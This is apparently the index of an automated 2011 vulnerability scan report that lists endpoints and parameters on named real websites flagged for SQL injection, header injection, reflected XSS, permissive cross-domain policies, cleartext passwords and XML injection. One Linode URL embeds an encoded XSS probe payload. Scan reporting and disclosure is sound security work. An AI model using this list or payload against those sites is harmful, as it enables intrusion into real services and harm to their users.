XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, 07202011-03

Report generated by XSS.CX at Wed Jul 20 07:45:44 CDT 2011.


1. SQL injection

1.1. http://cm.g.doubleclick.net/pixel [id cookie]

1.2. http://umfcluj.ro/Detaliu.aspx [t parameter]

1.3. http://umfcluj.ro/lista.aspx [t parameter]

1.4. http://www.facebook.com/plugins/like.php [datr cookie]

2. LDAP injection

3. HTTP header injection

3.1. http://ad.doubleclick.net/adi/N1558.NetMining/B5146585.127 [REST URL parameter 1]

3.2. http://ad.doubleclick.net/adj/cm.quadbostonglobe/ [REST URL parameter 1]

3.3. http://matcher.bidder7.mookie1.com/google [cver parameter]

4. Cross-site scripting (reflected)

4.1. http://a.collective-media.net/adj/cm.quadbostonglobe/ [REST URL parameter 2]

4.2. http://a.collective-media.net/adj/cm.quadbostonglobe/ [name of an arbitrarily supplied request parameter]

4.3. http://a.collective-media.net/adj/cm.quadbostonglobe/ [sz parameter]

4.4. http://a.collective-media.net/adj/q1.q.boston/be_bus [REST URL parameter 2]

4.5. http://a.collective-media.net/adj/q1.q.boston/be_bus [REST URL parameter 3]

4.6. http://a.collective-media.net/adj/q1.q.boston/be_bus [sz parameter]

4.7. http://a.collective-media.net/adj/q1.q.boston/be_home [REST URL parameter 2]

4.8. http://a.collective-media.net/adj/q1.q.boston/be_home [REST URL parameter 3]

4.9. http://a.collective-media.net/adj/q1.q.boston/be_home [name of an arbitrarily supplied request parameter]

4.10. http://a.collective-media.net/adj/q1.q.boston/be_home [sz parameter]

4.11. http://a.collective-media.net/adj/q1.q.boston/bus [REST URL parameter 2]

4.12. http://a.collective-media.net/adj/q1.q.boston/bus [REST URL parameter 3]

4.13. http://a.collective-media.net/adj/q1.q.boston/bus [name of an arbitrarily supplied request parameter]

4.14. http://a.collective-media.net/adj/q1.q.boston/bus [sz parameter]

4.15. http://a.collective-media.net/cmadj/q1.q.boston/be_bus [REST URL parameter 1]

4.16. http://a.collective-media.net/cmadj/q1.q.boston/be_bus [REST URL parameter 2]

4.17. http://a.collective-media.net/cmadj/q1.q.boston/be_bus [REST URL parameter 3]

4.18. http://a.collective-media.net/cmadj/q1.q.boston/be_bus [sz parameter]

4.19. http://a.collective-media.net/cmadj/q1.q.boston/be_home [REST URL parameter 1]

4.20. http://a.collective-media.net/cmadj/q1.q.boston/be_home [REST URL parameter 2]

4.21. http://a.collective-media.net/cmadj/q1.q.boston/be_home [REST URL parameter 3]

4.22. http://a.collective-media.net/cmadj/q1.q.boston/be_home [sz parameter]

4.23. http://a.collective-media.net/cmadj/q1.q.boston/bus [REST URL parameter 1]

4.24. http://a.collective-media.net/cmadj/q1.q.boston/bus [REST URL parameter 2]

4.25. http://a.collective-media.net/cmadj/q1.q.boston/bus [REST URL parameter 3]

4.26. http://a.collective-media.net/cmadj/q1.q.boston/bus [sz parameter]

4.27. http://a.netmng.com/hic/ [passback&click parameter]

4.28. http://a.netmng.com/hic/ [passback&click parameter]

4.29. http://admeld.adnxs.com/usersync [admeld_adprovider_id parameter]

4.30. http://admeld.adnxs.com/usersync [admeld_callback parameter]

4.31. http://admeld.lucidmedia.com/clicksense/admeld/match [admeld_adprovider_id parameter]

4.32. http://admeld.lucidmedia.com/clicksense/admeld/match [admeld_callback parameter]

4.33. http://api.bing.com/qsonhs.aspx [q parameter]

4.34. http://api.choicestream.com/instr/api/8e360375d27a5381/a1 [callback parameter]

4.35. http://b.scorecardresearch.com/beacon.js [c1 parameter]

4.36. http://b.scorecardresearch.com/beacon.js [c10 parameter]

4.37. http://b.scorecardresearch.com/beacon.js [c15 parameter]

4.38. http://b.scorecardresearch.com/beacon.js [c2 parameter]

4.39. http://b.scorecardresearch.com/beacon.js [c3 parameter]

4.40. http://b.scorecardresearch.com/beacon.js [c4 parameter]

4.41. http://b.scorecardresearch.com/beacon.js [c5 parameter]

4.42. http://b.scorecardresearch.com/beacon.js [c6 parameter]

4.43. http://b3.mookie1.com/2/TRACK_Ticketmaster/LN/RTG_SX_NonSecure@Bottom3 [REST URL parameter 2]

4.44. http://b3.mookie1.com/2/TRACK_Ticketmaster/LN/RTG_SX_NonSecure@Bottom3 [REST URL parameter 3]

4.45. http://b3.mookie1.com/2/TRACK_Ticketmaster/LN/RTG_SX_NonSecure@Bottom3 [REST URL parameter 4]

4.46. http://b3.mookie1.com/2/ticketmaster/172548/11408426983@x01 [REST URL parameter 2]

4.47. http://b3.mookie1.com/2/ticketmaster/172548/11408426983@x01 [REST URL parameter 3]

4.48. http://b3.mookie1.com/2/ticketmaster/172548/11408426983@x01 [REST URL parameter 4]

4.49. http://b3.mookie1.com/2/ticketmaster/AirCanadaCentre/11408426983@x01 [REST URL parameter 2]

4.50. http://b3.mookie1.com/2/ticketmaster/AirCanadaCentre/11408426983@x01 [REST URL parameter 3]

4.51. http://b3.mookie1.com/2/ticketmaster/AirCanadaCentre/11408426983@x01 [REST URL parameter 4]

4.52. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [&_RM_HTML_artist1_name_ parameter]

4.53. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [REST URL parameter 2]

4.54. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [REST URL parameter 3]

4.55. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [REST URL parameter 4]

4.56. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_artistid_ parameter]

4.57. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_bstate_ parameter]

4.58. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_bzip_ parameter]

4.59. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_confcode_ parameter]

4.60. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_country_ parameter]

4.61. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_event_date_ parameter]

4.62. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_event_day_ parameter]

4.63. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_event_name_ parameter]

4.64. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_event_time_ parameter]

4.65. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_event_time_zone_ parameter]

4.66. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_eventid_ parameter]

4.67. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_fvalue_ parameter]

4.68. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_majorcatid_ parameter]

4.69. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_minorcatid_ parameter]

4.70. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_pdate_ parameter]

4.71. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_pday_ parameter]

4.72. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_ptime_ parameter]

4.73. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_tixp_ parameter]

4.74. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_venue_name_ parameter]

4.75. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_venueid_ parameter]

4.76. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_venuezip_ parameter]

4.77. http://b3.mookie1.com/2/zzzSample/wwww.themig.com/1627503762@x96 [REST URL parameter 2]

4.78. http://b3.mookie1.com/2/zzzSample/wwww.themig.com/1627503762@x96 [REST URL parameter 3]

4.79. http://b3.mookie1.com/2/zzzSample/wwww.themig.com/1627503762@x96 [REST URL parameter 4]

4.80. http://b3.mookie1.com/2/zzzSample/wwww.themig.com/1936689153@x96 [REST URL parameter 2]

4.81. http://b3.mookie1.com/2/zzzSample/wwww.themig.com/1936689153@x96 [REST URL parameter 3]

4.82. http://b3.mookie1.com/2/zzzSample/wwww.themig.com/1936689153@x96 [REST URL parameter 4]

4.83. http://b3.mookie1.com/2/zzzSample/wwww.themig.com/1@x96 [REST URL parameter 2]

4.84. http://b3.mookie1.com/2/zzzSample/wwww.themig.com/1@x96 [REST URL parameter 3]

4.85. http://b3.mookie1.com/2/zzzSample/wwww.themig.com/1@x96 [REST URL parameter 4]

4.86. http://bing.fansnap.com/checkout/index/415814268 [REST URL parameter 3]

4.87. http://bing.fansnap.com/checkout/index/415814268 [afm parameter]

4.88. http://bing.fansnap.com/checkout/index/415814268 [ch parameter]

4.89. http://bing.fansnap.com/checkout/index/415814268 [ctx parameter]

4.90. http://bing.fansnap.com/checkout/index/415814268 [poctx parameter]

4.91. http://bing.fansnap.com/checkout/index/415814268 [quantity parameter]

4.92. http://bing.fansnap.com/checkout/index/415814268 [uet parameter]

4.93. http://bing.fansnap.com/checkout/index/418563179 [REST URL parameter 3]

4.94. http://bing.fansnap.com/checkout/index/418563179 [afm parameter]

4.95. http://bing.fansnap.com/checkout/index/418563179 [ch parameter]

4.96. http://bing.fansnap.com/checkout/index/418563179 [ctx parameter]

4.97. http://bing.fansnap.com/checkout/index/418563179 [poctx parameter]

4.98. http://bing.fansnap.com/checkout/index/418563179 [quantity parameter]

4.99. http://bing.fansnap.com/checkout/index/418563179 [uet parameter]

4.100. http://cdnt.meteorsolutions.com/api/track [jsonp parameter]

4.101. http://corporate.everydayhealth.com/ [name of an arbitrarily supplied request parameter]

4.102. http://corporate.everydayhealth.com/about-eh-sites.aspx [name of an arbitrarily supplied request parameter]

4.103. http://digg.com/ajax/tooltip/submit [REST URL parameter 1]

4.104. http://digg.com/ajax/tooltip/submit [REST URL parameter 2]

4.105. http://digg.com/submit [REST URL parameter 1]

4.106. http://ib.adnxs.com/ptj [redir parameter]

4.107. http://image.providesupport.com/cmd/versionone [REST URL parameter 1]

4.108. http://js.revsci.net/gateway/gw.js [csid parameter]

4.109. https://manager.linode.com/session/forgot_save/%22%3E%3CiMg%20src=N%20onerror=netsparker(9)%3E [REST URL parameter 3]

4.110. https://manager.linode.com/session/forgot_save/%22%3E%3CiMg%20src=N%20onerror=netsparker(9)%3E [REST URL parameter 3]

4.111. https://manager.linode.com/session/forgot_save/N [REST URL parameter 3]

4.112. http://pixel.invitemedia.com/admeld_sync [admeld_callback parameter]

4.113. http://r.turn.com/server/pixel.htm [fpid parameter]

4.114. http://r.turn.com/server/pixel.htm [sp parameter]

4.115. http://rd.rlcdn.com/rd [var parameter]

4.116. http://realnetworks.com/workarea/csslib/ektronCss.ashx [id parameter]

4.117. http://realnetworks.com/workarea/java/ektronJs.ashx [id parameter]

4.118. http://realnetworks.com/workarea/java/ektronJs.ashx [id parameter]

4.119. http://realnetworksrealarca.tt.omtrdc.net/m2/realnetworksrealarca/mbox/standard [mbox parameter]

4.120. http://rover.ebay.com/idmap/0 [footer&cb parameter]

4.121. http://sales.liveperson.net/visitor/addons/deploy.asp [site parameter]

4.122. http://sitelife.boston.com/ver1.0/Direct/Jsonp [cb parameter]

4.123. http://stubhub.tt.omtrdc.net/m2/stubhub/mbox/standard [mbox parameter]

4.124. http://support.fastteks.com/contact-us.php [name of an arbitrarily supplied request parameter]

4.125. http://tap-cdn.rubiconproject.com/partner/scripts/rubicon/page_parser.js [d parameter]

4.126. http://umfcluj.ro/contact.aspx [name of an arbitrarily supplied request parameter]

4.127. http://waypointlivingspaces.com/locate-dealer [zip parameter]

4.128. http://waypointlivingspaces.com/locate-dealer [zip parameter]

4.129. http://www.aaa.com/ [rurl parameter]

4.130. http://www.aaa.com/ [rurl parameter]

4.131. http://www.aaa.com/scripts/WebObjects.dll/ZipCode.woa/wa/route [rurl parameter]

4.132. http://www.aaa.com/scripts/WebObjects.dll/ZipCode.woa/wa/route [rurl parameter]

4.133. http://www.gamestop.com/ [name of an arbitrarily supplied request parameter]

4.134. http://www.gamestop.com/JavaScript/CertonaTable.htm [REST URL parameter 1]

4.135. http://www.gamestop.com/JavaScript/CertonaTable.htm [REST URL parameter 2]

4.136. http://www.gamestop.com/Recommendations.axd [REST URL parameter 1]

4.137. http://www.gamestop.com/ScriptResource.axd [REST URL parameter 1]

4.138. http://www.gamestop.com/WebResource.axd [REST URL parameter 1]

4.139. http://www.gamestop.com/common/gui/favicon.ico [REST URL parameter 1]

4.140. http://www.gamestop.com/common/gui/favicon.ico [REST URL parameter 2]

4.141. http://www.gamestop.com/common/gui/favicon.ico [REST URL parameter 3]

4.142. http://www.netlogiq.ro/Portofoliu-Web-Design.html [name of an arbitrarily supplied request parameter]

4.143. http://www.stumbleupon.com/submit [url parameter]

4.144. http://a.collective-media.net/cmadj/q1.q.boston/be_bus [cli cookie]

4.145. http://a.collective-media.net/cmadj/q1.q.boston/be_home [cli cookie]

4.146. http://a.collective-media.net/cmadj/q1.q.boston/bus [cli cookie]

4.147. http://seg.sharethis.com/getSegment.php [__stid cookie]

4.148. http://tag.admeld.com/ad/iframe/610/bostonglobe/160x600/bg_1064637_61606216 [meld_sess cookie]

4.149. http://tag.admeld.com/ad/iframe/610/bostonglobe/300x250/bg_1064637_61606228 [meld_sess cookie]

4.150. http://tag.admeld.com/ad/iframe/610/bostonglobe/728x90/bg_1064637_61606228 [meld_sess cookie]

4.151. http://www.clickmanage.com/events/clickevent.aspx [u parameter]

5. Flash cross-domain policy

5.1. http://0.gravatar.com/crossdomain.xml

5.2. http://1.gravatar.com/crossdomain.xml

5.3. http://a.collective-media.net/crossdomain.xml

5.4. http://a.netmng.com/crossdomain.xml

5.5. http://a.ok.facebook.com/crossdomain.xml

5.6. http://a.tribalfusion.com/crossdomain.xml

5.7. http://ad.doubleclick.net/crossdomain.xml

5.8. http://admeld.adnxs.com/crossdomain.xml

5.9. http://ads.as4x.tmcs.ticketmaster.com/crossdomain.xml

5.10. http://ads.undertone.com/crossdomain.xml

5.11. http://adx.adnxs.com/crossdomain.xml

5.12. http://api.brightcove.com/crossdomain.xml

5.13. http://b.scorecardresearch.com/crossdomain.xml

5.14. http://b3.mookie1.com/crossdomain.xml

5.15. http://bh.contextweb.com/crossdomain.xml

5.16. http://bs.serving-sys.com/crossdomain.xml

5.17. http://c.atdmt.com/crossdomain.xml

5.18. http://cache.specificmedia.com/crossdomain.xml

5.19. http://cdn.turn.com/crossdomain.xml

5.20. http://creatives.as4x.tmcs.net/crossdomain.xml

5.21. http://d.agkn.com/crossdomain.xml

5.22. http://dev.virtualearth.net/crossdomain.xml

5.23. http://ecn.api.tiles.virtualearth.net/crossdomain.xml

5.24. http://ecn.dev.virtualearth.net/crossdomain.xml

5.25. http://ecn.t0.tiles.virtualearth.net/crossdomain.xml

5.26. http://ecn.t1.tiles.virtualearth.net/crossdomain.xml

5.27. http://ecn.t2.tiles.virtualearth.net/crossdomain.xml

5.28. http://ecn.t3.tiles.virtualearth.net/crossdomain.xml

5.29. http://external.ak.fbcdn.net/crossdomain.xml

5.30. http://farecastcom.122.2o7.net/crossdomain.xml

5.31. http://files.livedrive.com/crossdomain.xml

5.32. http://g-pixel.invitemedia.com/crossdomain.xml

5.33. http://img1.catalog.video.msn.com/crossdomain.xml

5.34. http://img2.catalog.video.msn.com/crossdomain.xml

5.35. http://img3.catalog.video.msn.com/crossdomain.xml

5.36. http://img4.catalog.video.msn.com/crossdomain.xml

5.37. http://in.getclicky.com/crossdomain.xml

5.38. http://log50.doubleverify.com/crossdomain.xml

5.39. http://media.fastclick.net/crossdomain.xml

5.40. http://metrics.boston.com/crossdomain.xml

5.41. http://metrics.ticketmaster.com/crossdomain.xml

5.42. http://metrics.versionone.com/crossdomain.xml

5.43. http://now.eloqua.com/crossdomain.xml

5.44. http://pixel.invitemedia.com/crossdomain.xml

5.45. http://pixel.quantserve.com/crossdomain.xml

5.46. http://puma.vizu.com/crossdomain.xml

5.47. http://r.turn.com/crossdomain.xml

5.48. http://s3.amazonaws.com/crossdomain.xml

5.49. http://secure.adnxs.com/crossdomain.xml

5.50. http://segment-pixel.invitemedia.com/crossdomain.xml

5.51. http://statse.webtrendslive.com/crossdomain.xml

5.52. http://stubhub.tt.omtrdc.net/crossdomain.xml

5.53. http://t.mookie1.com/crossdomain.xml

5.54. http://wa.stubhub.com/crossdomain.xml

5.55. http://www.clickmanage.com/crossdomain.xml

5.56. http://add.my.yahoo.com/crossdomain.xml

5.57. http://api.bing.com/crossdomain.xml

5.58. http://api.choicestream.com/crossdomain.xml

5.59. http://b.myspace.com/crossdomain.xml

5.60. http://cdn.stumble-upon.com/crossdomain.xml

5.61. http://cgi.ebay.com/crossdomain.xml

5.62. http://developers.facebook.com/crossdomain.xml

5.63. http://edge.sharethis.com/crossdomain.xml

5.64. http://feeds.bbci.co.uk/crossdomain.xml

5.65. http://googleads.g.doubleclick.net/crossdomain.xml

5.66. http://newsrss.bbc.co.uk/crossdomain.xml

5.67. http://rover.ebay.com/crossdomain.xml

5.68. http://srx.main.ebayrtm.com/crossdomain.xml

5.69. http://static.ak.fbcdn.net/crossdomain.xml

5.70. http://wd.sharethis.com/crossdomain.xml

5.71. http://www.facebook.com/crossdomain.xml

5.72. http://www.myspace.com/crossdomain.xml

5.73. http://www.res-x.com/crossdomain.xml

5.74. http://www.stumbleupon.com/crossdomain.xml

5.75. http://www.ticketmaster.com/crossdomain.xml

5.76. http://boston.com/crossdomain.xml

5.77. http://cache.boston.com/crossdomain.xml

5.78. http://rmedia.boston.com/crossdomain.xml

5.79. http://www.boston.com/crossdomain.xml

6. Silverlight cross-domain policy

6.1. http://ad.doubleclick.net/clientaccesspolicy.xml

6.2. http://b.scorecardresearch.com/clientaccesspolicy.xml

6.3. http://c.atdmt.com/clientaccesspolicy.xml

6.4. http://dev.virtualearth.net/clientaccesspolicy.xml

6.5. http://ecn.api.tiles.virtualearth.net/clientaccesspolicy.xml

6.6. http://ecn.dev.virtualearth.net/clientaccesspolicy.xml

6.7. http://ecn.t0.tiles.virtualearth.net/clientaccesspolicy.xml

6.8. http://ecn.t1.tiles.virtualearth.net/clientaccesspolicy.xml

6.9. http://ecn.t2.tiles.virtualearth.net/clientaccesspolicy.xml

6.10. http://ecn.t3.tiles.virtualearth.net/clientaccesspolicy.xml

6.11. http://farecastcom.122.2o7.net/clientaccesspolicy.xml

6.12. http://img1.catalog.video.msn.com/clientaccesspolicy.xml

6.13. http://img2.catalog.video.msn.com/clientaccesspolicy.xml

6.14. http://img3.catalog.video.msn.com/clientaccesspolicy.xml

6.15. http://img4.catalog.video.msn.com/clientaccesspolicy.xml

6.16. http://metrics.boston.com/clientaccesspolicy.xml

6.17. http://metrics.ticketmaster.com/clientaccesspolicy.xml

6.18. http://metrics.versionone.com/clientaccesspolicy.xml

6.19. http://wa.stubhub.com/clientaccesspolicy.xml

6.20. http://a1.bing4.com/clientaccesspolicy.xml

6.21. http://a2.bing4.com/clientaccesspolicy.xml

6.22. http://a3.bing4.com/clientaccesspolicy.xml

6.23. http://a4.bing4.com/clientaccesspolicy.xml

6.24. http://api.bing.com/clientaccesspolicy.xml

6.25. http://ts1.mm.bing.net/clientaccesspolicy.xml

6.26. http://ts2.mm.bing.net/clientaccesspolicy.xml

6.27. http://ts3.mm.bing.net/clientaccesspolicy.xml

6.28. http://ts4.mm.bing.net/clientaccesspolicy.xml

6.29. http://profile.live.com/clientaccesspolicy.xml

7. Cleartext submission of password

7.1. http://digg.com/submit

7.2. http://forum.redbyte.ro/

7.3. http://waypointlivingspaces.com/function.mysql-connect

7.4. http://waypointlivingspaces.com/locate-dealer

7.5. http://waypointlivingspaces.com/user

7.6. http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html

7.7. http://www.facebook.com/r.php

7.8. http://www.nne.aaa.com/en-nne/Pages/Home.aspx

8. XML injection

8.1. http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/images/1px.png [REST URL parameter 1]

8.2. http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/images/1px.png [REST URL parameter 2]

8.3. http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/images/1px.png [REST URL parameter 3]

8.4. http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-15.gif [REST URL parameter 1]

8.5. http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-15.gif [REST URL parameter 2]

8.6. http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-15.gif [REST URL parameter 3]

8.7. http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-15.gif [REST URL parameter 4]

8.8. http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-15.gif [REST URL parameter 1]

8.9. http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-15.gif [REST URL parameter 2]

8.10. http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-15.gif [REST URL parameter 3]

8.11. http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-15.gif [REST URL parameter 4]

8.12. http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/best-valuepoint-17px.png [REST URL parameter 1]

8.13. http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/best-valuepoint-17px.png [REST URL parameter 2]

8.14. http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/best-valuepoint-17px.png [REST URL parameter 3]

8.15. http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/best-valuepoint-17px.png [REST URL parameter 4]

8.16. http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js [REST URL parameter 1]

8.17. http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js [REST URL parameter 2]

8.18. http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js [REST URL parameter 3]

8.19. http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/checkout_interstitial.js [REST URL parameter 1]

8.20. http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/checkout_interstitial.js [REST URL parameter 2]

8.21. http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/checkout_interstitial.js [REST URL parameter 3]

8.22. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/cancel.png [REST URL parameter 1]

8.23. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/cancel.png [REST URL parameter 2]

8.24. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/cancel.png [REST URL parameter 3]

8.25. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-large-549.gif [REST URL parameter 1]

8.26. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-large-549.gif [REST URL parameter 2]

8.27. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-large-549.gif [REST URL parameter 3]

8.28. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-large-549.gif [REST URL parameter 4]

8.29. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-135.gif [REST URL parameter 1]

8.30. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-135.gif [REST URL parameter 2]

8.31. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-135.gif [REST URL parameter 3]

8.32. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-135.gif [REST URL parameter 4]

8.33. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-143.gif [REST URL parameter 1]

8.34. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-143.gif [REST URL parameter 2]

8.35. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-143.gif [REST URL parameter 3]

8.36. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-143.gif [REST URL parameter 4]

8.37. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-511.gif [REST URL parameter 1]

8.38. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-511.gif [REST URL parameter 2]

8.39. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-511.gif [REST URL parameter 3]

8.40. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-511.gif [REST URL parameter 4]

8.41. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-522.gif [REST URL parameter 1]

8.42. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-522.gif [REST URL parameter 2]

8.43. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-522.gif [REST URL parameter 3]

8.44. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-522.gif [REST URL parameter 4]

8.45. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-529.gif [REST URL parameter 1]

8.46. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-529.gif [REST URL parameter 2]

8.47. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-529.gif [REST URL parameter 3]

8.48. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-529.gif [REST URL parameter 4]

8.49. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-549.gif [REST URL parameter 1]

8.50. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-549.gif [REST URL parameter 2]

8.51. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-549.gif [REST URL parameter 3]

8.52. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-549.gif [REST URL parameter 4]

8.53. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-664.gif [REST URL parameter 1]

8.54. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-664.gif [REST URL parameter 2]

8.55. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-664.gif [REST URL parameter 3]

8.56. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-664.gif [REST URL parameter 4]

8.57. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-135.gif [REST URL parameter 1]

8.58. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-135.gif [REST URL parameter 2]

8.59. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-135.gif [REST URL parameter 3]

8.60. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-135.gif [REST URL parameter 4]

8.61. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-511.gif [REST URL parameter 1]

8.62. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-511.gif [REST URL parameter 2]

8.63. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-511.gif [REST URL parameter 3]

8.64. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-511.gif [REST URL parameter 4]

8.65. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-522.gif [REST URL parameter 1]

8.66. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-522.gif [REST URL parameter 2]

8.67. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-522.gif [REST URL parameter 3]

8.68. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-522.gif [REST URL parameter 4]

8.69. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-529.gif [REST URL parameter 1]

8.70. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-529.gif [REST URL parameter 2]

8.71. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-529.gif [REST URL parameter 3]

8.72. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-529.gif [REST URL parameter 4]

8.73. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-549.gif [REST URL parameter 1]

8.74. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-549.gif [REST URL parameter 2]

8.75. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-549.gif [REST URL parameter 3]

8.76. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-549.gif [REST URL parameter 4]

8.77. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-664.gif [REST URL parameter 1]

